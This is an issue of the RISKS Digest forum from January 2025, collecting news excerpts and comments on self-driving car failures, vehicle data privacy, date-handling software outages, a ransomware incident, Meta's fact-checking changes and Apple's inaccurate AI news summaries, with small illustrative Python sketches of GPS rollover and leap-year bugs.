• From RISKS List Owner@risko@csl.sri.com to risks-resend@csl.sri.com on Sat Jan 11 19:16:17 2025
    Subject: Risks Digest 34.52

    RISKS-LIST: Risks-Forum Digest Saturday 11 January 2025 Volume 34 : Issue 52

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, founder and still moderator

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <http://www.risks.org> as
    <http://catless.ncl.ac.uk/Risks/34.52>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    10 killed and dozens injured in pickup-truck attack on New Orleans crowd
    (Lauren Weinstein)
    'Fundamentally wrong': Self-driving Tesla steers Calif. tech
    founder onto train tracks (SFGate)
    Driver accidentally disconnects autopilot, crashes car
    (Lars-Henrik Eriksson)
    Driver in Las Vegas Cybertruck explosion used ChatGPT to plan
    blast, authorities say (NBC News)
    It's not just Tesla. Vehicles amass huge troves of possibly
    sensitive data. (WashPost)
    Tech allows Big Auto to evolve into Big Brother
    (LA Times via Jim Geissman)
    Wrong turn from GPS leaves car abandoned on Colorado ski run (9news.com)
    A Waymo robotaxi and a Serve delivery robot collided in Los Angeles
    (TechCrunch)
    Waymo robotaxis can make walking across the street a game of chicken
    (The Washington Post)
    Trifecta of articles in *LA Times* about cars (Steve Bacher)
    LA Sheriff outage (LA Times)
    Eutelsat resolves OneWeb leap year software glitch
    after two-day outage (SpaceNews)
    Traffic lights will have a fourth color in 2025
    (ecoticias via Steve Bacher)
    FAA chief: Boeing must shift focus to safety over profit
    (LA Times)
    ARRL hit with ransomware (ARRL)
    Taiwan Suspects China of Latest Undersea Cable Attack
    (Tom Nicholson)
    The Memecoin Shenanigans Are Just Getting Started (WiReD)
    Apple to pay $95M to settle lawsuit accusing Siri of
    eavesdropping (CBC)
    Meta Getting Rid of Fact Checkers (Clare Duffy)
    Huge problems with axing fact-checkers, Meta oversight
    board says (BBC)
    Meta hosts AI chatbots of 'Hitler,' 'Jesus Christ,' Taylor Swift
    (NBC News)
    God can take Sunday off
    (NYTimes via Tom Van Vleck)
    Several items Google and Meta (Lauren Weinstein)
    AI means the end of Internet search as we've known it (Technology Review)
    Is it still 'social media' if it's overrun by AI? (CBC)
    AI Incident Database (Steve Bacher)
    Apple's AI News Summaries and Inventions (BBC)
    What real people think about Google Search today (Lauren Weinstein)
    WARNING: Google Voice is flagging LEGITIMATE robocalls from
    insurance companies to their customers in the fires as spam
    (Lauren Weinstein)
    A non-tech analogy for Google Search AI Overviews (Lauren Weinstein)
    Happy new year, compute carefully (Tom Van Vleck)
    How to understand Generative AI (Lauren Weinstein)
    Google censoring my AI criticism? (Lauren Weinstein)
    U.S. newspapers are deleting old crime stories offering
    subjects a clean slate (The Guardian)
    EU Commission Fined for Transferring User Data
    to Meta in Violation of Privacy Laws (THN)
    The Ghosts in the Spotify Machine (Liz Pelly)
    Spotify (Rob Slade)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Wed, 1 Jan 2025 09:09:56 -0800
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: 10 killed and dozens injured in pickup-truck attack on New Orleans
    crowd

    Driver was killed by police. It is reported that he shot at them and
    also had explosive devices. Pickup is reportedly registered to a 42
    year old man from Texas. -L

    ------------------------------

    Date: Sat, 4 Jan 2025 09:45:55 -0700
    From: geoff goodfellow <geoff@iconia.com>
    Subject: 'Fundamentally wrong': Self-driving Tesla steers Calif. tech
    founder onto train tracks (SFGate)

    Jesse Lyu trusts his Tesla’s “self-driving” technology; he’s taken it to
    work, and he’s gone on 45-minute drives without ever needing to intervene. He’s a “happy customer,” he told SFGATE. But on Thursday, his Tesla scared
    him, badly.

    Lyu, the founder and CEO of artificial intelligence gadget startup Rabbit,
    was on the 15-minute drive from his apartment to his office in downtown
    Santa Monica. He’d turned on his car’s self-driving features, called “Autopilot” and “Full Self-Driving (Supervised),” after pulling out of his
    parking garage. The pay-to-add features are meant to drive the Tesla with “minimal driver intervention,” steering, stopping and accelerating on highways and even in city traffic, according to Tesla's website. Lyu was cruising along, resting his arms on the steering wheel but letting the car direct itself, he said in a video interview Friday.

    Then, Lyu’s day took a turn for the worse. At a stoplight, his Tesla turned left onto Colorado Avenue, but it missed the lane for cars. Instead, it
    plunged onto a street-grade light rail track between the road’s vehicle traffic lanes, paved but meant solely for trains on LA’s Metro E Line. He couldn’t just move over — a low concrete barrier separates the lanes, and a fence stands on the other side.

    “It’s just f–king crazy,” he said, narrating a video he posted to X of the
    incident. “I’ve got nowhere to go. And, you can tell from behind -- the train’s right here.” (He pointed to the oncoming train, stopped about a block behind his car.) [...] https://www.sfgate.com/tech/article/tesla-fsd-jesse-lyu-train-20014242.php

    ------------------------------

    Date: Sat, 4 Jan 2025 10:25:39 +0100
    From: Lars-Henrik Eriksson <lhe@it.uu.se>
    Subject: Driver accidentally disconnects autopilot, crashes car

    A Swedish driver was convicted for reckless driving and insurance fraud
    after crashing his Tesla.

    To show off, he engaged the autopilot at a speed of 70-80 km/h and then
    moved over into the passenger seat. After a short while the car
    crashed. Fortunately no one was seriously hurt. It was initially seen as a normal car accident and his insurance compensated him for the car which was
    a total loss, but his (now ex) wife had recorded everything from the back
    seat and later turned the video over to the police.

    The police asked him if he was aware that the autopilot would disengage if
    the driver's seat belt was released, and he replied that he wasn't.

    The risk here is not primarily one of idiot drivers but of the increasing
    complexity of modern cars: drivers do not fully understand how their cars
    behave, and there is no real pressure motivating them to learn. In traffic,
    you can see drivers frequently mishandling even such a relatively simple
    thing as automatic front and rear lights.

    In aviation, pilots of larger aircraft have to take formal training to completely understand the aircraft systems. Even with smaller aircraft --
    which may have less complex systems than modern cars -- pilots are expected
    to read up on how the aircraft systems operate.

    (https://www.unt.se/nyheter/tarnsjo/artikel/filmbeviset-trodde-bilen-var-sjalvkorande-kraschade/j8ex8emj, in Swedish and behind a paywall.)

    ------------------------------

    Date: Wed, 8 Jan 2025 06:40:48 -0800
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: Driver in Las Vegas Cybertruck explosion used ChatGPT to plan
    blast, authorities say (NBC News)

    NBC News (01/07/25), Tom Winter, Andrew Blankstein, and Antonio Planas

    The soldier who authorities believe blew up a Cybertruck on New Year's Day
    in front of the entrance of the Trump International Hotel in Las Vegas used artificial intelligence to guide him about how to set off the explosion, officials said Tuesday.

    Matthew Alan Livelsberger, 37, queried ChatGPT for information about how he could put together an explosive, how fast a round would need to be fired for the explosives found in the truck to go off -- not just catch fire -- and what laws he would need to get around to get the materials, law enforcement officials said.

    An OpenAI spokesperson said, "ChatGPT responded with information already publicly available on the Internet and provided warnings against harmful or illegal activities."

    https://www.nbcnews.com/news/us-news/driver-las-vegas-cybertruck-explosion-used-chatgpt-plan-blast-authorit-rcna186704

    ------------------------------

    Date: Sat, 4 Jan 2025 08:46:42 -0700
    From: geoff goodfellow <geoff@iconia.com>
    Subject: It's not just Tesla. Vehicles amass huge troves of possibly
    sensitive data. (WashPost)

    Video footage and other data collected by Tesla helped law enforcement
    quickly piece together how a Cybertruck came to explode outside the Trump International Hotel in Las Vegas on New Year's Day.

    The trove of digital evidence also served as a high-profile demonstration of how much data modern cars collect about their drivers and those around them.

    Data privacy experts say the investigation -- which has determined that
    the driver, active-duty U.S. Army soldier Matthew Livelsberger, died by
    suicide before the blast -- highlights how car companies vacuum up reams of data that can clear up mysteries but also be stolen or given to third
    parties without drivers' knowledge. There are few regulations controlling
    how and when law enforcement authorities can access data in cars, and
    drivers are often unaware of the vast digital trail they leave behind.
    ``These are panopticons on wheels,'' said Albert Fox Cahn, who founded the Surveillance Technology Oversight Project, an advocacy group that argues the volume and precision of data collected can pose civil liberties concerns for people in sensitive situations, like attending protests or going to abortion clinics.

    Federal and state officials have begun to scrutinize companies' use of car
    data as evidence has emerged of its misuse. There have been reports that abusive spouses tracked partners' locations, and that insurers raised rates based on driving behavior data shared by car companies. There have also been cases in which local police departments sought video from Tesla cars that
    may have recorded a crime, or obtained warrants to tow vehicles to secure
    such footage. [...]

    https://www.msn.com/en-us/news/technology/it-s-not-just-tesla-vehicles-amass-huge-troves-of-possibly-sensitive-data/ar-AA1wX8Lo

    ------------------------------

    Date: Mon, 6 Jan 2025 07:33:49 -0800
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: Tech allows Big Auto to evolve into Big Brother

    [Another on this topic]

    Your car is spying on you.

    That is one takeaway from the fast, detailed data that Tesla collected on
    the driver of one of its Cybertrucks that exploded in Las Vegas last week.

    Privacy data experts say the deep dive by Elon Musk's company was impressive but also shines a spotlight on a difficult question as vehicles become more like computers on wheels.

    Is your car company violating your privacy rights?

    "You might want law enforcement to have the data to crack down on criminals, but can anyone have access to it?" said Jodi Daniels, chief executive of the privacy consulting firm Red Clover Advisors. "Where is the line?"

    Many of the latest cars not only know where you've been and where you are going, but also often have access to your contacts, your call logs, your
    texts and other sensitive information, thanks to cellphone syncing.

    The data collected by Musk's electric car company after the Cybertruck
    packed with fireworks burst into flames in front of the Trump International Hotel proved valuable to police in helping track the driver's movements.

    http://enewspaper.latimes.com/infinity/article_share.aspx?guid=432286e7-91d3-4e45-9e57-aa95a830767e

    ------------------------------

    Date: Tue, 7 Jan 2025 03:03:33 -0700
    From: Jim Reisert AD1C <jjreisert@alum.mit.edu>
    Subject: Wrong turn from GPS leaves car abandoned on Colorado ski
    run (9news.com)

    Melissa Reeves, 9NEWS, Updated: 10:19 PM MST January 6, 2025

    The Summit County Sheriff's Office (SCSO) posted pictures on social
    media of an abandoned car at Keystone Resort that was left behind on a
    ski run overnight.

    The sheriff's office said the driver left the car after it got stuck
    in the snow, but they left a note on the car's windshield for the
    resort and police that made it easy to find them.

    The note explained that the driver was following directions from a GPS
    as they were on their way to visit a friend who lives in nearby
    employee housing.

    https://www.9news.com/article/news/local/colorado-news/driver-makes-wrong-turn-keystone-ski-run/73-b54a9f76-451e-44b9-b5e8-014d28963a6d

    ------------------------------

    Date: Fri, 3 Jan 2025 18:45:51 -0700
    From: geoff goodfellow <geoff@iconia.com>
    Subject: A Waymo robotaxi and a Serve delivery robot collided in
    Los Angeles (TechCrunch)

    On 27 Dec 2024, a Waymo robotaxi and a Serve Robotics sidewalk delivery
    robot collided at a Los Angeles intersection, according to a video that's circulating on social media.

    The footage shows a Serve bot crossing a street in West Hollywood at night
    and trying to get onto the sidewalk. It reached the curb, backed up a little
    to correct itself and started moving toward the ramp. That's when a Waymo
    making a right turn hit the little bot. [...]

    https://techcrunch.com/2024/12/31/a-waymo-robotaxi-and-a-serve-delivery-robot-collided-in-los-angeles/

    ------------------------------

    Date: Mon, 30 Dec 2024 15:24:37 -0500
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Waymo robotaxis can make walking across the street a game of
    chicken (The Washington Post)

    On roads teeming with robotaxis, crossing the street can be harrowing -- Our tech columnist captured videos of Waymo self-driving cars failing to stop
    for him at a crosswalk. How does an AI learn how to break the law?

    https://www.washingtonpost.com/technology/2024/12/30/waymo-pedestrians-robotaxi-crosswalks/

    ------------------------------

    Date: Mon, 6 Jan 2025 06:42:54 -0800
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: Trifecta of articles in *LA Times* about cars

    Los Angeles man is trapped in circling Waymo on way to airport: 'Is
    somebody playing a joke?'
    [Matthew Kruk spotted this one:
    Mike Johns boarded a driverless Waymo taxi to an airport in Scottsdale,
    Arizona, but it began spinning in circles in a parking lot. He filmed the
    moment he was trapped in the vehicle, unable to stop the car or get help.
    Johns said he almost missed his flight.
    https://www.bbc.com/news/videos/c70e2g09ng9o]

    LA tech entrepreneur Mike Johns posted a video of his call to a customer service representative for Waymo to report that the car kept turning in
    circles.

    https://www.latimes.com/california/story/2025-01-05/los-angeles-man-trapped-in-circling-waymo-says-he-missed-his-flight-home

    [Jim Geissman also noted it. PGN]

    ------------------------------

    Date: Thu, 2 Jan 2025 09:21:47 -0800
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: LA Sheriff outage (LA Times)

    A few hours before the ball dropped on New Year's Eve, the computer dispatch system for the Los Angeles County Sheriff's Department crashed, rendering
    all patrol car computers nearly useless and forcing deputies to handle all calls by radio, according to officials and sources in the department.

    Department leaders first learned of the problem around 8 p.m., when deputies
    at several sheriff's stations began having trouble logging onto their patrol car computers, officials told The Times in a statement.

    The department said it eventually determined its computer-aided dispatch program -- known as CAD -- was "not allowing personnel to log on with the
    new year, making the CAD inoperable."

    It's not clear how long it will take to fix the problem, but in the meantime deputies and dispatchers are handling everything old-school -- using their radios instead of patrol car computers.

    "It's our own little Y2K," a deputy who was working Wednesday morning told
    The Times.

    https://www.latimes.com/california/story/2025-01-01/l-a-sheriffs-dispatch-system-crashes-on-new-years-eve

    And there is more on this -- a "temporary fix". http://enewspaper.latimes.com/infinity/article_share.aspx?guid=8276009d-5b4b-4787-bece-ec72b2bbe0df

    [Also noted by Jan Wolitzky. Also, Paul Saffo noted

    If the trouble began a little after 16:00 local time (00:00 UTC), I
    would suspect the system was keeping time internally with UTC, but news
    reports say it started around 20:00. Furthermore, they say the system is
    old and needs to be replaced, which implies it's handled the end of year
    successfully many times.

    Perhaps there's a rollover issue, such as the GPS week number rollover
    that happened years ago. Since that occurred, my ca. 2000 Magellan
    receiver is years in error in its dates, though it still navigates
    without trouble. In fact, it's better than new in that respect. Rarely
    do I see its positions off by more than 10 feet. PS

    It still smells like a residual Y2K-type poor retrofix. PGN]
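
    As background on that GPS reference: the legacy GPS navigation message
    carries the week number as a 10-bit field, so it wraps every 1024 weeks
    (about 19.6 years), and a receiver has to guess which 1024-week epoch it is
    in -- often relative to a pivot date baked into its firmware. That is why an
    old unit can report dates almost two decades off while still navigating
    correctly. A minimal Python sketch of the ambiguity (illustrative only, not
    any particular receiver's firmware):

    from datetime import datetime, timedelta

    GPS_EPOCH = datetime(1980, 1, 6)     # start of GPS week 0
    WEEKS_PER_ROLLOVER = 1024            # the broadcast week field is 10 bits

    def resolve_date(broadcast_week, seconds_of_week, firmware_pivot):
        """Pick the first 1024-week epoch that puts the date at or after the
        receiver's pivot date (a simplification of real firmware logic)."""
        epoch = 0
        while True:
            full_week = epoch * WEEKS_PER_ROLLOVER + broadcast_week
            candidate = GPS_EPOCH + timedelta(weeks=full_week,
                                              seconds=seconds_of_week)
            if candidate >= firmware_pivot:
                return candidate
            epoch += 1

    # A true date in late 2019 (after the April 2019 rollover) broadcasts
    # week 30.  A receiver with a ca.-2000 pivot resolves it into the
    # 1999-2019 epoch and is exactly 1024 weeks early; ranging still works
    # because it uses seconds-of-week, not the calendar date.
    old = resolve_date(30, 0, firmware_pivot=datetime(2000, 1, 1))
    new = resolve_date(30, 0, firmware_pivot=datetime(2019, 5, 1))
    print(old.date(), new.date())        # 2000-03-19 vs 2019-11-03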

    ------------------------------

    Date: Thu, 2 Jan 2025 18:03:01 -0500
    From: Steve Golson <sgolson@trilobyte.com>
    Subject: Eutelsat resolves OneWeb leap year software glitch
    after two-day outage (SpaceNews)

    https://spacenews.com/eutelsat-resolves-oneweb-leap-year-software-glitch-after-two-day-outage/

    Eutelsat said Jan. 2 it has restored services across its low Earth orbit
    (LEO) OneWeb broadband network following a two-day outage.

    The software issue was caused by a failure to account for 2024 being a leap year… services were partially restored 36 hours after the disruption began
    31 Dec 2024.
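
    Eutelsat has not detailed the root cause beyond the missed leap year, but a
    common way such bugs bite on 31 Dec is date code that converts a day-of-year
    using fixed 365-day months and therefore has no slot for day 366. A
    hypothetical Python sketch of that failure mode (not OneWeb's actual code):

    DAYS_IN_MONTH = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]  # no leap day

    def doy_to_date_buggy(year, doy):
        """Convert a 1-based day-of-year to (month, day), ignoring leap years."""
        for month, length in enumerate(DAYS_IN_MONTH, start=1):
            if doy <= length:
                return month, doy
            doy -= length
        raise ValueError("day-of-year out of range")  # hit on 31 Dec of a leap year

    def doy_to_date(year, doy):
        """Correct version: give February its extra day when needed."""
        months = list(DAYS_IN_MONTH)
        if year % 4 == 0 and (year % 100 != 0 or year % 400 == 0):
            months[1] = 29
        for month, length in enumerate(months, start=1):
            if doy <= length:
                return month, doy
            doy -= length
        raise ValueError("day-of-year out of range")

    print(doy_to_date(2024, 366))        # (12, 31)
    print(doy_to_date_buggy(2024, 366))  # raises ValueError on 31 Dec 2024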

    ------------------------------

    Date: Wed, 1 Jan 2025 09:14:58 -0800
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: Traffic lights will have a fourth color in 2025

    It is hard not to recognize the famous red, yellow, and green traffic
    signals on roads throughout the globe. By 2025, traffic signals may see one
    of their biggest changes yet, with one more color added to them. The shift
    aims to accommodate the growing number of autonomous vehicles (AVs) and to
    redefine traffic management, making it safer and more effective in the
    future. [...]

    The proposed fourth color is white: it would signal that self-driving
    vehicles are managing traffic conditions at the intersection. Unlike
    traditional traffic signals, which tell motorists what behavior is expected
    of them, the white light tells human drivers to mimic the behavior of the
    AVs at the intersection. The system leverages the idea that AVs are
    intelligent vehicles that actively relay information and manage traffic
    flow.

    When AVs reach an intersection, they communicate with the traffic signals,
    as well as with other AVs, to achieve the best flow. When AVs are in
    command, a white light informs human drivers of what the self-driving
    vehicles intend to do. This makes it easier for human drivers to decide how
    to proceed, easing traffic congestion and making the road safer. [...]

    https://www.ecoticias.com/en/traffic-lights-fourth-color/10086/
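
    A toy Python sketch of the decision such a signal controller might make,
    assuming (as the article describes) that connected AVs announce themselves
    to the signal and that human drivers follow the AVs during the white phase;
    the threshold value and phase names here are purely illustrative, not from
    any standard or deployed system:

    from dataclasses import dataclass

    @dataclass
    class Approach:
        queued_vehicles: int
        connected_avs: int        # AVs currently coordinating with the signal

    WHITE_PHASE_THRESHOLD = 0.4   # illustrative value only

    def choose_phase(approaches):
        """Return 'WHITE' when connected AVs dominate the queues enough to
        manage the intersection; otherwise keep the normal signal cycle."""
        total = sum(a.queued_vehicles for a in approaches)
        if total == 0:
            return "NORMAL_CYCLE"
        av_share = sum(a.connected_avs for a in approaches) / total
        return "WHITE" if av_share >= WHITE_PHASE_THRESHOLD else "NORMAL_CYCLE"

    print(choose_phase([Approach(10, 6), Approach(8, 3)]))   # WHITE
    print(choose_phase([Approach(10, 1), Approach(8, 0)]))   # NORMAL_CYCLE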

    [Don't fire the traffic-manager programmer until you see the WHITES of his
    LIGHTS? PGN]

    ------------------------------

    Date: Mon, 6 Jan 2025 07:47:23 -0800
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: FAA chief: Boeing must shift focus to safety over profit

    Boeing used to manufacture airplanes and made a profit as a side-effect. Then it changed to making profit primary, with airplanes as the side-effect. The FAA is telling them to go back to the original model.

    A year after a panel blew out of a Boeing 737 Max during a flight, the
    nation's top aviation regulator says the company needs "a fundamental
    cultural shift" to put safety and quality above profit.

    Mike Whitaker, chief of the Federal Aviation Administration, said in an
    online post Friday that his agency also has more work to do in its oversight
    of Boeing.

    Whitaker, who plans to step down in two weeks to let President-elect Donald Trump pick his own FAA administrator, looked back on his decision last
    January to ground all 737 Max jets with similar panels called door plugs. Later, the FAA put more inspectors in Boeing factories, limited production
    of new 737s and required Boeing to come up with a plan to fix manufacturing problems.

    "Boeing is working to make progress executing its comprehensive plan in the areas of safety, quality improvement and effective employee engagement and training," Whitaker said. "But this is not a one-year project. What's needed
    is a fundamental cultural shift at Boeing that's oriented around safety and quality above profits. That will require sustained effort and commitment
    from Boeing, and unwavering scrutiny on our part."

    http://enewspaper.latimes.com/infinity/article_share.aspx?guid=72e50023-50c9-470e-812e-39984c87cf63

    ------------------------------

    Date: Thu, 2 Jan 2025 18:03:09 -0500
    From: Steve Golson <sgolson@trilobyte.com>
    Subject: ARRL hit with ransomware (ARRL)

    American Radio Relay League (ARRL), the U.S. national association for
    amateur radio, was hit with a sophisticated ransomware attack.

    https://www.arrl.org/news/arrl-it-security-incident-report-to-members

    Sometime in early May 2024, ARRL’s systems network was compromised by threat
    actors (TAs) using information they had purchased on the dark web. The TAs
    accessed headquarters on-site systems and most cloud-based systems. They
    used a wide variety of payloads affecting everything from desktops and
    laptops to Windows-based and Linux-based servers. Despite the wide variety
    of target configurations, the TAs seemed to have a payload that would host
    and execute encryption or deletion of network-based IT assets, as well as
    launch demands for a ransom payment, for every system.

    This serious incident was an act of organized crime. The highly coordinated
    and executed attack took place during the early morning hours of May 15.
    That morning, as staff arrived, it was immediately apparent that ARRL had
    become the victim of an extensive and sophisticated ransomware attack. The
    FBI categorized the attack as “unique”, as they hadn't yet seen this level
    of sophistication among the many other attacks they have experience with.

    The ransom demands by the TAs, in exchange for access to their decryption tools, were exorbitant. It was clear they didn’t know, and didn’t care, that
    they had attacked a small 501(c)(3) organization with limited
    resources. Their ransom demands were dramatically weakened by the fact that they did not have access to any compromising data. It was also clear that
    they believed ARRL had extensive insurance coverage that would cover a multi-million-dollar ransom payment.

    ------------------------------

    Date: Wed, 8 Jan 2025 11:24:10 -0500 (EST)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: Taiwan Suspects China of Latest Undersea Cable Attack
    (Tom Nicholson)

    Politico Europe (01/05/25) Tom Nicholson

    Taiwanese officials suspect a Cameroon-flagged cargo ship owned by Je Yang Trading Limited of Hong Kong, led by Chinese citizen Guo Wenjie, was responsible for cutting an international undersea telecom cable on
    Jan. 3. The Shunxin-39 was intercepted by Taiwan's coast guard, but rough weather prevented an on-board investigation, and the ship continued on to a South Korean port.

    ------------------------------

    Date: Thu, 9 Jan 2025 21:11:00 -0500
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: The Memecoin Shenanigans Are Just Getting Started (WiReD)

    The market for absurdist cryptocurrencies mutated into a
    hundred-billion-dollar phenomenon in 2024. Yes, things can get even more deranged.

    Around that time, a bunch of other celebrities—from Caitlyn Jenner to Andrew Tate and Jason Derulo—were all launching their own crypto coins. The
    pile-on reflected a renewed fervor among traders for memecoins, a type of cryptocurrency that generally has no utility beyond financial speculation.

    Because memecoins do not generate revenue or cash flow, their value is
    entirely based on the attention they attract, which can fluctuate
    wildly. Though some people make a lot of money on memecoins, many others
    lose out. With a general euphoria taking hold in cryptoland as the price of bitcoin rises to historic levels above $100,000, the stage is set for yet further memecoin “degeneracy,” says Azeem Khan, cofounder of the Morph blockchain and venture partner at crypto VC firm Foresight Ventures.

    https://www.wired.com/story/memecoins-cryptocurrency-regulation

    ------------------------------

    Date: Fri, 3 Jan 2025 11:05:47 -0700
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: Apple to pay $95M to settle lawsuit accusing Siri of
    eavesdropping (CBC)

    https://www.cbc.ca/news/business/apple-siri-privacy-settlement-1.7422363

    Apple has agreed to pay $95 million US to settle a lawsuit accusing the privacy-minded company of deploying its virtual assistant Siri to eavesdrop
    on people using its iPhone and other trendy devices.

    The proposed settlement filed Tuesday in an Oakland, Calif., federal court would resolve a five-year-old lawsuit revolving around allegations that
    Apple surreptitiously activated Siri to record conversations through
    iPhones and other devices equipped with the virtual assistant for more than
    a decade.

    ------------------------------

    Date: Wed, 8 Jan 2025 11:24:10 -0500 (EST)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: Meta Getting Rid of Fact Checkers (Clare Duffy)

    CNN (01/07/25), Clare Duffy

    Mark Zuckerberg said Tuesday that Meta will adjust its content review
    policies on Facebook and Instagram, replacing fact checkers with
    user-generated "community notes." In doing so, Zuckerberg follows in the footsteps of Elon Musk who, after acquiring Twitter, dismantled the
    company's fact-checking teams. Said Zuckerberg, "Fact checkers have been too politically biased and have destroyed more trust than they've created."

    ------------------------------

    Date: Wed, 8 Jan 2025 07:08:55 -0700
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: Huge problems with axing fact-checkers, Meta oversight
    board says (BBC)

    https://www.bbc.com/news/articles/cjwlwlqpwx7o

    While Meta says the move -- which is being introduced in the US initially --
    is about free speech, others have suggested it is an attempt to get closer
    to the incoming Trump administration, and catch up with the access and influence enjoyed by another tech titan, Elon Musk.

    The tech journalist and author Kara Swisher told the BBC it was "the most cynical move" she had seen Mr Zuckerberg make in the "many years" she had
    been reporting on him.

    "Facebook does whatever is in its self-interest", she said.
    "He wants to kiss up to Donald Trump, and catch up with Elon Musk in that
    act."

    ------------------------------

    Date: Thu, 9 Jan 2025 14:19:32 -0500
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Meta hosts AI chatbots of 'Hitler,' 'Jesus Christ,' Taylor Swift
    (NBC News)

    Meta says it reviews every user-generated AI chatbot, but NBC News found
    dozens that seemed to violate Meta’s policies.

    https://www.nbcnews.com/tech/social-media/meta-user-made-ai-chatbots-include-hitler-jesus-christ-rcna186206

    ------------------------------

    Date: Wed, 8 Jan 2025 08:41:43 -0500
    From: Tom Van Vleck <thvv@multicians.org>
    Subject: God can take Sunday off (NYTimes)

    from the New York Times 8 Jan 2025

    To members of his synagogue, the voice that played over the speakers of Congregation EmanuEl in Houston sounded just like Rabbi Josh Fixler's. In
    the same steady rhythm his congregation had grown used to, the voice
    delivered a sermon about what it meant to be a neighbor in the age of artificial intelligence. Then, Rabbi Fixler took to the bimah himself. "The audio you heard a moment ago may have sounded like my words," he said. "But they weren't." The recording was created by what Rabbi Fixler called "Rabbi Bot," an AI chatbot trained on his old sermons. The chatbot, created with
    the help of a data scientist, wrote the sermon, even delivering it in an
    AI version of his voice. During the rest of the service, Rabbi Fixler intermittently asked Rabbi Bot questions aloud, which it would promptly
    answer.

    Rabbi Fixler is among a growing number of religious leaders experimenting
    with AI in their work, spurring an industry of faith-based tech companies
    that offer AI tools, from assistants that can do theological research to chatbots that can help write sermons. [...] Religious leaders have used
    AI to translate their livestreamed sermons into different languages in
    real time, blasting them out to international audiences. Others have
    compared chatbots trained on tens of thousands of pages of Scripture to a
    fleet of newly trained seminary students, able to pull excerpts about
    certain topics nearly instantaneously. The report's author draws a parallel
    to previous generations' initial apprehension -- and eventual embrace -- of transformative technologies like radio, television, and the Internet. "For centuries, new technologies have changed the ways people worship, from the radio in the 1920s to television sets in the 1950s and the Internet in the 1990s," the report says. "Some proponents of AI in religious spaces have
    gone back even further, comparing AI's potential -- and fears of it -- to
    the invention of the printing press in the 15th century."

    Well, we are halfway there. Now all we need is AI-generated parishioners.

    Think of the savings in time and real estate. Church services can be over
    in microseconds. No need for church buildings, pews, altars: all virtual.
    They could repurpose churches as Amazon warehouses, patrolled by robots.

    ------------------------------

    Date: Thu, 9 Jan 2025 11:29:50 PST
    From: Peter Neumann <neumann@csl.sri.com>
    Subject: Several items Google and Meta (Lauren Weinstein)

    * Google gives a million dollars to Trump inauguration, as billionaire CEO
    Sundar goes full MAGA

    * Changes at Meta amount to a MAGA Makeover, Kevin Roose, *The New York
    Times*, 9 Jan 2025, front page of Business Section.
    [Lauren suggests META == Make Evil Trendy Again.]

    * Zuckerberg falls in line, goes fully MAGA
    Joe Garofoli, *The San Francisco Chronicle*, 9 Jan 2025

    * Google gives a million dollars to Trump inauguration, as billionaire CEO
    Sundar goes full MAGA, Lauren Weinstein, 9 Jan 2025

    [The best government money can buy? PGN]

    ------------------------------

    Date: Wed, 8 Jan 2025 08:47:42 -0800
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: AI means the end of Internet search as
    we've known it (Technology Review)

    The way we navigate the web is changing, and it’s paving the way to a more AI-saturated future.

    https://www.technologyreview.com/2025/01/06/1108679/ai-generative-search-internet-breakthroughs/

    ------------------------------

    Date: Wed, 8 Jan 2025 06:47:35 -0700
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: Is it still 'social media' if it's overrun by AI? (CBC)

    https://www.cbc.ca/news/business/meta-ai-generated-characters-future-social-media-1.7424641

    Back in 2010, a 26-year-old Mark Zuckerberg shared his vision for Facebook
    -- by that point a wildly popular social network with more than 500-million users.

    "The primary thing that we focus on all day long is how to help people
    share and stay connected with their friends, family and the people in the community around them," Zuckerberg told CNBC. "That's what we care about,
    and that's why we started the company."

    Fifteen years and three billion users later, Facebook's parent company Meta
    has a new vision: characters powered by artificial intelligence existing alongside actual friends and family. Some experts caution that this could
    mark the end of social media as we know it.

    For early users of social media, platforms like Facebook and Instagram have become "about as anti-social as you can imagine," said Carmi Levy, a
    technology analyst and journalist based in London, Ont. "It's becoming increasingly difficult to connect with an actual human being."

    ------------------------------

    Date: Sat, 4 Jan 2025 08:38:38 -0800
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: AI Incident Database

    This should be of interest to RISKS readers:

    Welcome to the Artificial Intelligence Incident Database
    Search over 3000 reports of AI harms
    https://incidentdatabase.ai/

    ------------------------------

    Date: Tue, 7 Jan 2025 14:32:38 -0800
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: Apple's AI News Summaries and Inventions (BBC)

    https://www.bbc.com/news/articles/cge93de21n0o

    Apple is facing fresh calls to withdraw its controversial artificial intelligence (AI) feature that has generated inaccurate news alerts on its latest iPhones.

    The product is meant to summarise breaking news notifications but has in
    some instances invented entirely false claims.

    The BBC first complained to the tech giant about its journalism being misrepresented in December but Apple did not respond until Monday this week, when it said it was working to clarify that summaries were AI-generated.


    Alan Rusbridger, the former editor of the Guardian, told the BBC Apple
    needed to go further and pull a product he said was "clearly not ready."

    Mr Rusbridger, who also sits on Meta's Oversight Board that reviews appeals
    of the company's content moderation decisions, added the technology was "out
    of control" and posed a considerable misinformation risk.

    "Trust in news is low enough already without giant American corporations
    coming in and using it as a kind of test product," he told the Today
    programme, on BBC Radio Four.

    The National Union of Journalists (NUJ), one of the world's largest unions
    for journalists, said Apple "must act swiftly" and remove Apple Intelligence
    to avoid misinforming the public -- echoing prior calls by journalism body Reporters Without Borders <https://www.bbc.co.uk/news/articles/cx2v778x85yo> (RSF).

